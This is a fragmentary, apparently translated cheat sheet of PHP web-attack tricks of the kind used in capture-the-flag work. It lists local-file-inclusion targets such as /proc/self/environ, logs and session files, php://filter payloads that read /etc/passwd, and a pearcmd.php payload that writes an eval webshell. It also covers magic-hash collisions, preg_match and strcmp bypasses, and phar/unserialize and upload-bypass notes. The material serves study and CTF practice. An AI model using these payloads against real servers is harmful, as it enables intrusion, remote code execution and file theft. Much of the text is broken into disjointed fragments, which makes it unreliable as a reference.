aaa.php\x00.jpg
Front end/back end: jpg; parsed as: php
location
phpinfo.php
common
docker
to config
Configuration mode: affects how it is configured
$a[]=1;$a[]=2; // $a = [1,2]
: array append
'system'('ls');
: call function by string
$a='system';$a('ls');
class A{static function f(){}};['A','f']();
: call class by array
$a = function () use ($var) {};
as
declares the variable
foreach([1] as $a);var_dump($a);
as
can take a reference, but the as
operation itself is equivalent to an assignment, so beware of side effects
$a=fn($b)=>$b+1;
class a{};$b='a';new $b;
cannot directly write new 'a';
'\system'('ls');
'\0' + name + filename + ':' + start_lineno + '$' + rtd_key_counter
short_open_tag
<?php
: Standard tag
<?=
= <?php echo
: Short echo tag
<?
: Short tag, enabled by default
2021/12: a pile of new black magic appeared...
from easy to hard
/usr/local/lib/php/pearcmd.php
/proc/self/environ
& User-Agent
/var/log/apache2/access.log
/var/log/apache2/error.log
TODO
/var/log/auth.log
/tmp/PHP
/var/tmp
/var/lib/php/sessions
/var/lib/php/
/var/lib/php/sessions
/tmp/
/tmp/sessions/
Linux
.../php[a-zA-Z0-9]{6}
Windows
.../php[A-F0-9]{4}.tmp
file_uploads=On
.../upload_progress_<PHPSESSID>
session.upload_progress.enabled
.../sess_<PHPSESSID>
$_SESSION['xxxx'] = 'ooooo';
<<>"
allow_url_fopen=Off = 0
to RFI
ref: Gynvael Coldwind
${upload_tmp_dir}/php[a-zA-Z0-9]{6}
C:/Windows/php[A-F0-9]{4}.tmp
Multiple files: https://www.php.net/manual/en/features.file-upload.multiple.php ; could this be used to bypass checks?
php://filter/string.strip_tags/resource=/etc/passwd
php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA
/tmp/php[a-zA-Z0-9]{6}
C:\Windows\php<<
$_SESSION
PHPSESSID
.
in namesession.upload_progress.enabled
.../upload_progress_<PHPSESSID>
PHP_SESSION_UPLOAD_PROGRESS=xxxx
upload_progress_xxxx|.....
/proc/self/environ
& User-Agent
/var/lib/nginx/body/$X
/proc/$pid/cmdline
find the nginx pid
/var/lib/nginx/fastcgi/x/y/0000000yx
/usr/local/lib/php/pearcmd.php
+
separates arguments
?/usr/local/lib/php/pearcmd.php&+-c+/tmp/.feng.php+-d+man_dir=<?eval($_GET[0]);?>+-s
.png
, LFI appends .php
phar://aaa.png/bbb.php
php://filter/read=convert.base64-encode/resource=/etc/passwd
=
is valid, but after decoding there is no corresponding character, so it causes truncation; convert.iconv.UTF-8.UTF-7 can be used
to strip the =
string.strip_tags (<PHP 7.3.0): strips <> tags, and also strips unclosed tags
b<aaa
=> b
Black magic
php_sys_lstat
resolve an fd to a deleted file: include(/proc/self/root/proc/self/root/proc.../proc/34/fd/15)
p == hash(p)
:0e215962017=>0e291242476940776845150308577824
hash(p) == 0
:12832323351hello=>0e107303994101791601610489605716
hash(num) == 0
: 240610708=>0e462097431906509019562988736854
hash(UPPER) == 0
: QLTHNDT=>0e405967825401955372549139051580
.V;m=*]b?-=>00e45653718969294213009554265803
require_once
uniqid
Returns timestamp based unique identifier as a string.
move_uploaded_file
make sure that the file name is not bigger than 250 characters.
parse_url
scheme = 1*[ lowalpha | digit | "+" | "-" | "." ]
fragment
is parsed first; only after it comes the query
filter_var
sha1
preg_match
uses PCRE
7.4.0 - 7.4.30: returns false when the first or second argument is not a string
$a=['A','m'];if(!preg_match('/a-z/i',$a))$a();
8.0.1 - 8.0.21, 8.1.0 - 8.1.8: throws an error when the first or second argument is not a string
regex escaping mistakes
var_dump(preg_match("/\\|a/", "\\"));
var_dump(preg_match("/\\\\|a/", "\\"));
backtracking limit is 1,000,000
var_dump(strcmp([],'secret') == strcmp('secret','secret'));
/aaa.jpg/bbb.php
cgi.fix_pathinfo=0
Patched
<
->*
, a single one sometimes fails; two consecutive <
convert more reliably
>
->?
"
-> .
.
, include(htaccess) === include(.htaccess)
allow_url_fopen=Off
(RFI): include('\\remote\xxx.php')
serialize
, unserialize
__destruct
if the parent object has
__wakeup
the order will not be disrupted
__PHP_Incomplete_Class_Name
carries the class name being looked up
__PHP_Incomplete_Class_Name
then the properties are cleared
kaibro
bypass gd manipulate
store
The file's extension will be determined by examining the file's MIME type.